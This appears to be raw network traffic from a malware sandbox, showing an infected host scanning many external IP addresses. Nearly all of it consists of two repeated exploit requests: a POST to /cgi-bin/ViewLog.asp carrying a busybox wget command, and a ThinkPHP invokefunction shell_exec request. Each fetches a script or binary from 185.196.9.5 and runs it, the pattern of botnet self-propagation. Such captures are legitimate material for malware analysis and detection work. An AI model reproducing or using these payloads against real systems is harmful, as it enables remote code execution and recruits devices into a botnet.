Feb 25, 2024 19:02:45.734374046 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
97	192.168.2.15	37248	94.120.111.214	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:02:42.572268009 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
98	192.168.2.15	40812	85.122.227.39	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:02:42.601018906 CET	322	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
99	192.168.2.15	37932	95.168.180.48	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:02:42.623315096 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:02:42.803147078 CET	457	IN	HTTP/1.1 301 Moved Permanently Date: Sun, 25 Feb 2024 18:02:42 GMT Location: https://s80093.dedi.leaseweb.net/index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' Connection: close Content-Type: text/html Content-Length: 56 Data Raw: 3c 48 54 4d 4c 3e 3c 42 4f 44 59 3e 3c 48 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 48 31 3e 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e Data Ascii: <HTML><BODY><H1>301 Moved Permanently</H1></BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
100	192.168.2.15	38458	95.217.22.93	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:02:42.642451048 CET	318	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:02:42.837968111 CET	490	IN	HTTP/1.1 400 Bad Request Content-Type: text/html; charset=us-ascii Server: Microsoft-HTTPAPI/2.0 Date: Sun, 25 Feb 2024 18:02:42 GMT Connection: close Content-Length: 311 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 72 65 71 75 65 73 74 20 69 73 20 62 61 64 6c 79 20 66 6f 72 6d 65 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Bad Request</h2><hr><p>HTTP Error 400. The request is badly formed.</p></BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
101	192.168.2.15	50230	95.110.222.87	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:02:42.645186901 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:02:42.844676971 CET	427	IN	HTTP/1.1 400 Bad Request Date: Sun, 25 Feb 2024 23:01:19 GMT Server: Apache X-Frame-Options: DENY Content-Length: 226 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
102	192.168.2.15	48768	94.121.211.81	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:02:42.794080019 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
103	192.168.2.15	34354	94.122.194.182	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:02:42.796161890 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
104	192.168.2.15	44638	94.123.28.91	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:02:42.796267033 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
105	192.168.2.15	43764	62.29.62.104	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:02:42.798921108 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
106	192.168.2.15	57428	94.182.28.13	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:02:42.874061108 CET	322	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:02:43.162452936 CET	498	IN	HTTP/1.1 400 Bad Request Date: Sun, 25 Feb 2024 18:02:41 GMT Server: Apache Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 33 30 32 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p><p>Additionally, a 302 Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
107	192.168.2.15	35384	85.75.195.30	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:02:43.006243944 CET	322	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
108	192.168.2.15	34956	94.120.160.179	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:02:43.015285969 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
109	192.168.2.15	49538	94.122.69.65	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:02:43.015382051 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
110	192.168.2.15	48300	94.120.61.82	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:02:43.018132925 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
111	192.168.2.15	40444	112.187.64.61	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:02:43.084213972 CET	318	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:02:44.550344944 CET	318	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:02:46.278292894 CET	318	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:02:49.830250978 CET	318	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:02:56.742193937 CET	318	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:03:10.566235065 CET	318	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:03:38.981864929 CET	318	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0

Session ID	Source IP	Source Port	Destination IP	Destination Port
112	192.168.2.15	42928	112.126.90.235	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:02:43.102765083 CET	318	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:02:43.404548883 CET	323	IN	HTTP/1.1 400 Bad Request Server: nginx/1.4.4 Date: Sun, 25 Feb 2024 18:02:43 GMT Content-Type: text/html Content-Length: 172 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 34 2e 34 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.4.4</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
113	192.168.2.15	39104	112.197.41.86	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:02:43.221585989 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:02:43.608616114 CET	339	IN	HTTP/1.0 400 Bad Request Date: Mon, 26 Feb 2024 01:02:43 GMT Server: Boa/0.94.14rc21 Accept-Ranges: bytes Connection: close Content-Type: text/html; charset=ISO-8859-1 Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 3e 3c 48 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 48 31 3e 0a 59 6f 75 72 20 63 6c 69 65 6e 74 20 68 61 73 20 69 73 73 75 65 64 20 61 20 6d 61 6c 66 6f 72 6d 65 64 20 6f 72 20 69 6c 6c 65 67 61 6c 20 72 65 71 75 65 73 74 2e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>400 Bad Request</TITLE></HEAD><BODY><H1>400 Bad Request</H1>Your client has issued a malformed or illegal request.</BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
114	192.168.2.15	44482	31.136.243.16	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:02:43.757746935 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:02:46.758311033 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:02:52.902354002 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:03:04.934128046 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:03:30.789930105 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
